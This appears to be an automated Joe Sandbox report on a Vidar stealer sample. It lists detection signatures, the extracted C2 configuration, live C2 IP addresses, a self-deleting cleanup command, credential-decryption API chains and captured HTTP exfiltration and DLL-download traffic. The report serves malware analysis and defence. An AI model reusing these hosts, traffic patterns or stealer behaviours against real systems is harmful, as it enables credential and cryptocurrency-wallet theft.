Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
out.exe

Overview

General Information

Sample name:out.exe
Analysis ID:1528360
MD5:7a2f8827805aba605ac201a9f0c2cb03
SHA1:f1e15c229cf82f17d5f98cc6ad29247446bf54ca
SHA256:0781a4d72a9f35f27a6608e0e5ec8afbf3ee1e39c656b6e5f0582b60d34fa018
Tags:exeuser-N3utralZ0ne
Infos:

Detection

Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Detected unpacking (creates a PE file in dynamic memory)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Powershell download and execute
Yara detected Vidar
Yara detected Vidar stealer
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Found many strings related to Crypto-Wallets (likely being stolen)
Machine Learning detection for sample
PE file has a writeable .text section
Searches for specific processes (likely to inject)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to dynamically determine API calls
Contains functionality to enumerate process and check for explorer.exe or svchost.exe (often used for thread injection)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Extensive use of GetProcAddress (often used to hide API calls)
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE file contains sections with non-standard names
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses the keyboard layout for branch decision (may execute only for specific keyboard layouts)
Yara detected Credential Stealer

Classification

Process Tree

  • System is w10x64
  • out.exe (PID: 1396 cmdline: "C:\Users\user\Desktop\out.exe" MD5: 7A2F8827805ABA605AC201A9F0C2CB03)
    • cmd.exe (PID: 7132 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\BKEBFHIJECFI" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
      • conhost.exe (PID: 6552 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • timeout.exe (PID: 3656 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar

Malware Configuration

Threatname: Vidar

{"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "744fd163d6d4e0ac37e4032bcbfbb6af"}

Yara Signatures

Initial Sample

SourceRuleDescriptionAuthorStrings
out.exeJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
    out.exeJoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
      out.exeJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security

        PCAP (Network Traffic)

        SourceRuleDescriptionAuthorStrings
        sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
          sslproxydump.pcapJoeSecurity_Vidar_2Yara detected VidarJoe Security

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000000.00000000.2039473209.0000000000050000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
              00000000.00000000.2039473209.0000000000050000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                  00000000.00000002.2676135055.0000000000050000.00000002.00000001.01000000.00000003.sdmpJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                    Process Memory Space: out.exe PID: 1396JoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                      Click to see the 3 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      0.2.out.exe.20000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                        0.2.out.exe.20000.0.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
                          0.0.out.exe.20000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                            0.0.out.exe.20000.0.unpackJoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security

                              Sigma Signatures

                              No Sigma rule has matched

                              Suricata Signatures

                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-10-07T20:35:21.007155+020020287653Unknown Traffic192.168.2.54975249.12.106.214443TCP
                              2024-10-07T20:35:22.166238+020020287653Unknown Traffic192.168.2.54976349.12.106.214443TCP
                              2024-10-07T20:35:23.734166+020020287653Unknown Traffic192.168.2.54977449.12.106.214443TCP
                              2024-10-07T20:35:25.030726+020020287653Unknown Traffic192.168.2.54978249.12.106.214443TCP
                              2024-10-07T20:35:26.384044+020020287653Unknown Traffic192.168.2.54979149.12.106.214443TCP
                              2024-10-07T20:35:27.795548+020020287653Unknown Traffic192.168.2.54980249.12.106.214443TCP
                              2024-10-07T20:35:28.802525+020020287653Unknown Traffic192.168.2.54981049.12.106.214443TCP
                              2024-10-07T20:35:31.697871+020020287653Unknown Traffic192.168.2.54983149.12.106.214443TCP
                              2024-10-07T20:35:32.861245+020020287653Unknown Traffic192.168.2.54983949.12.106.214443TCP
                              2024-10-07T20:35:34.359756+020020287653Unknown Traffic192.168.2.54985149.12.106.214443TCP
                              2024-10-07T20:35:35.854422+020020287653Unknown Traffic192.168.2.54986049.12.106.214443TCP
                              2024-10-07T20:35:37.780067+020020287653Unknown Traffic192.168.2.54987549.12.106.214443TCP
                              2024-10-07T20:35:39.358579+020020287653Unknown Traffic192.168.2.54988749.12.106.214443TCP
                              2024-10-07T20:35:41.113143+020020287653Unknown Traffic192.168.2.54989949.12.106.214443TCP
                              2024-10-07T20:35:43.163643+020020287653Unknown Traffic192.168.2.54991349.12.106.214443TCP
                              2024-10-07T20:35:44.613860+020020287653Unknown Traffic192.168.2.54992449.12.106.214443TCP
                              2024-10-07T20:35:47.991700+020020287653Unknown Traffic192.168.2.54994649.12.106.214443TCP
                              2024-10-07T20:35:49.382271+020020287653Unknown Traffic192.168.2.54995349.12.106.214443TCP
                              2024-10-07T20:35:50.698257+020020287653Unknown Traffic192.168.2.54996349.12.106.214443TCP
                              2024-10-07T20:35:52.212160+020020287653Unknown Traffic192.168.2.54997449.12.106.214443TCP
                              2024-10-07T20:35:54.353536+020020287653Unknown Traffic192.168.2.54998849.12.106.214443TCP
                              2024-10-07T20:35:56.383056+020020287653Unknown Traffic192.168.2.54999849.12.106.214443TCP
                              2024-10-07T20:35:57.702528+020020287653Unknown Traffic192.168.2.54999949.12.106.214443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-10-07T20:35:59.176328+020020544951A Network Trojan was detected192.168.2.55000045.132.206.25180TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-10-07T20:35:25.704302+020020442471Malware Command and Control Activity Detected49.12.106.214443192.168.2.549782TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-10-07T20:35:27.078262+020020518311Malware Command and Control Activity Detected49.12.106.214443192.168.2.549791TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-10-07T20:35:24.405392+020020490871A Network Trojan was detected192.168.2.54977449.12.106.214443TCP

                              Joe Sandbox Signatures

                              Click to jump to signature section

                              Show All Signature Results

                              AV Detection

                              barindex
                              Antivirus detection for URL or domain
                              Source: https://t.me/ae5edURL Reputation: Label: malware
                              Found malware configuration
                              Source: out.exeMalware Configuration Extractor: Vidar {"C2 url": ["https://steamcommunity.com/profiles/76561199780418869"], "Botnet": "744fd163d6d4e0ac37e4032bcbfbb6af"}
                              AI detected suspicious sample
                              Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                              Machine Learning detection for sample
                              Source: out.exeJoe Sandbox ML: detected
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_000280A1 CryptUnprotectData,LocalAlloc,LocalFree,0_2_000280A1
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_00028048 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00028048
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_00031E5D CryptBinaryToStringA,GetProcessHeap,HeapAlloc,CryptBinaryToStringA,0_2_00031E5D
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0002A7D8 _memset,lstrlenA,CryptStringToBinaryA,PK11_GetInternalKeySlot,PK11_Authenticate,PK11SDR_Decrypt,_memmove,lstrcatA,PK11_FreeSlot,lstrcatA,0_2_0002A7D8
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_6C426C80 CryptQueryObject,CryptMsgGetParam,moz_xmalloc,memset,CryptMsgGetParam,CertFindCertificateInStore,free,CertGetNameStringW,moz_xmalloc,memset,CertGetNameStringW,CertFreeCertificateContext,CryptMsgClose,CertCloseStore,CreateFileW,moz_xmalloc,memset,memset,CryptQueryObject,free,CloseHandle,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,moz_xmalloc,memset,GetLastError,moz_xmalloc,memset,CryptBinaryToStringW,_wcsupr_s,free,GetLastError,memset,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerSetConditionMask,VerifyVersionInfoW,__Init_thread_footer,__Init_thread_footer,0_2_6C426C80

                              Compliance

                              barindex
                              Detected unpacking (creates a PE file in dynamic memory)
                              Source: C:\Users\user\Desktop\out.exeUnpacked PE file: 0.2.out.exe.27650000.3.unpack
                              Source: out.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                              Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.5:49736 version: TLS 1.2
                              Source: unknownHTTPS traffic detected: 49.12.106.214:443 -> 192.168.2.5:49752 version: TLS 1.2
                              Source: Binary string: freebl3.pdb source: out.exe, 00000000.00000002.2684995165.0000000032033000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.0.dr
                              Source: Binary string: mozglue.pdbP source: out.exe, 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmp, out.exe, 00000000.00000002.2688032896.0000000037FA5000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.0.dr
                              Source: Binary string: freebl3.pdbp source: out.exe, 00000000.00000002.2684995165.0000000032033000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.0.dr
                              Source: Binary string: nss3.pdb@ source: out.exe, 00000000.00000002.2698488618.000000004FD52000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr
                              Source: Binary string: softokn3.pdb@ source: out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr
                              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: out.exe, 00000000.00000002.2695905232.0000000049DE1000.00000004.00000020.00020000.00000000.sdmp, vcruntime140.dll.0.dr
                              Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: out.exe, 00000000.00000002.2690538362.000000003DF10000.00000004.00000020.00020000.00000000.sdmp, msvcp140.dll.0.dr
                              Source: Binary string: nss3.pdb source: out.exe, 00000000.00000002.2698488618.000000004FD52000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2704845435.000000006C64F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr
                              Source: Binary string: C:\Users\Dan\Desktop\work\sqlite\tmp\sqlite_bld_dir\2\sqlite3.pdb source: out.exe, 00000000.00000003.2392913103.000000000303A000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000003.2393034605.000000000303D000.00000004.00000020.00020000.00000000.sdmp, out.exe, 00000000.00000002.2681976750.0000000027868000.00000002.00001000.00020000.00000000.sdmp, out.exe, 00000000.00000002.2682330461.0000000029D9E000.00000004.00000020.00020000.00000000.sdmp
                              Source: Binary string: mozglue.pdb source: out.exe, 00000000.00000002.2704193891.000000006C48D000.00000002.00000001.01000000.00000008.sdmp, out.exe, 00000000.00000002.2688032896.0000000037FA5000.00000004.00000020.00020000.00000000.sdmp, mozglue.dll.0.dr
                              Source: Binary string: softokn3.pdb source: out.exe, 00000000.00000002.2693189593.0000000043E75000.00000004.00000020.00020000.00000000.sdmp, softokn3.dll.0.dr
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0003543D wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,FindNextFileA,FindClose,0_2_0003543D
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_00034CC8 wsprintfA,FindFirstFileA,_memset,_memset,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcatA,strtok_s,strtok_s,_memset,lstrcatA,strtok_s,PathMatchSpecA,DeleteFileA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,strtok_s,strtok_s,FindNextFileA,FindClose,0_2_00034CC8
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_00029D1C FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00029D1C
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_00021D80 FindFirstFileA,StrCmpCA,StrCmpCA,FindFirstFileA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00021D80
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0002D5C6 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0002D5C6
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0002B5DF FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0002B5DF
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0002BF4D FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0002BF4D
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_00035FD1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00035FD1
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0002B93F FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0002B93F
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_00035B0B GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcatA,lstrcatA,lstrlenA,lstrlenA,0_2_00035B0B
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_0002CD37 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlenA,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0002CD37
                              Source: C:\Users\user\Desktop\out.exeCode function: 0_2_00035142 GetLogicalDriveStringsA,_memset,GetDriveTypeA,lstrcpyA,lstrcpyA,lstrcpyA,lstrlenA,0_2_00035142
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                              Source: C:\Users\user\Desktop\out.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                              Source: C:\Users\user\Desktop\out.exeCode function: 4x nop then mov eax, dword ptr fs:[00000030h]0_2_000214AD
                              Source: C:\Users\user\Desktop\out.exeCode function: 4x nop then mov dword ptr [ebp-04h], eax0_2_000214AD

                              Networking

                              barindex
                              Suricata IDS alerts for network traffic
                              Source: Network trafficSuricata IDS: 2054495 - Severity 1 - ET MALWARE Vidar Stealer Form Exfil : 192.168.2.5:50000 -> 45.132.206.251:80
                              Source: Network trafficSuricata IDS: 2049087 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST : 192.168.2.5:49774 -> 49.12.106.214:443
                              Source: Network trafficSuricata IDS: 2051831 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 : 49.12.106.214:443 -> 192.168.2.5:49791
                              Source: Network trafficSuricata IDS: 2044247 - Severity 1 - ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config : 49.12.106.214:443 -> 192.168.2.5:49782
                              C2 URLs / IPs found in malware configuration
                              Source: Malware configuration extractorURLs: https://steamcommunity.com/profiles/76561199780418869
                              Source: global trafficHTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                              Source: Joe Sandbox ViewIP Address: 104.102.49.254 104.102.49.254
                              Source: Joe Sandbox ViewIP Address: 45.132.206.251 45.132.206.251
                              Source: Joe Sandbox ViewASN Name: HETZNER-ASDE HETZNER-ASDE
                              Source: Joe Sandbox ViewASN Name: AKAMAI-ASUS AKAMAI-ASUS
                              Source: Joe Sandbox ViewASN Name: LIFELINK-ASRU LIFELINK-ASRU
                              Source: Joe Sandbox ViewJA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
                              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49802 -> 49.12.106.214:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49810 -> 49.12.106.214:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49791 -> 49.12.106.214:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49752 -> 49.12.106.214:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49782 -> 49.12.106.214:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49774 -> 49.12.106.214:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49763 -> 49.12.106.214:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49831 -> 49.12.106.214:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49839 -> 49.12.106.214:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49851 -> 49.12.106.214:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49860 -> 49.12.106.214:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49875 -> 49.12.106.214:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49887 -> 49.12.106.214:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49899 -> 49.12.106.214:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49924 -> 49.12.106.214:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49913 -> 49.12.106.214:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49946 -> 49.12.106.214:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49953 -> 49.12.106.214:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49963 -> 49.12.106.214:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49988 -> 49.12.106.214:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49998 -> 49.12.106.214:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49974 -> 49.12.106.214:443
                              Source: Network trafficSuricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.5:49999 -> 49.12.106.214:443
                              Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HJEHIJEBKEBFBFHIIDHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJEGDBGDBFIJKECBAKFBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----DBKEGCAEGIIJKFIEHIJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFIIIJJKJKFHIDGDBAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KEHJKJDGCGDAKFHIDBGCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 5801Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGHDAKKJJJKJKECBGCGDUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJEGDGIJECGCBGCGHDGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFIIIJJKJKFHIDGDBAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Connection: Keep-AliveCache-Control: no-cache
                              Source: global trafficHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BKJEGDGIJECGCBGCGHDGUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 49.12.106.214Content-Length: 1145Connection: Keep-AliveCache-Control: no-cache
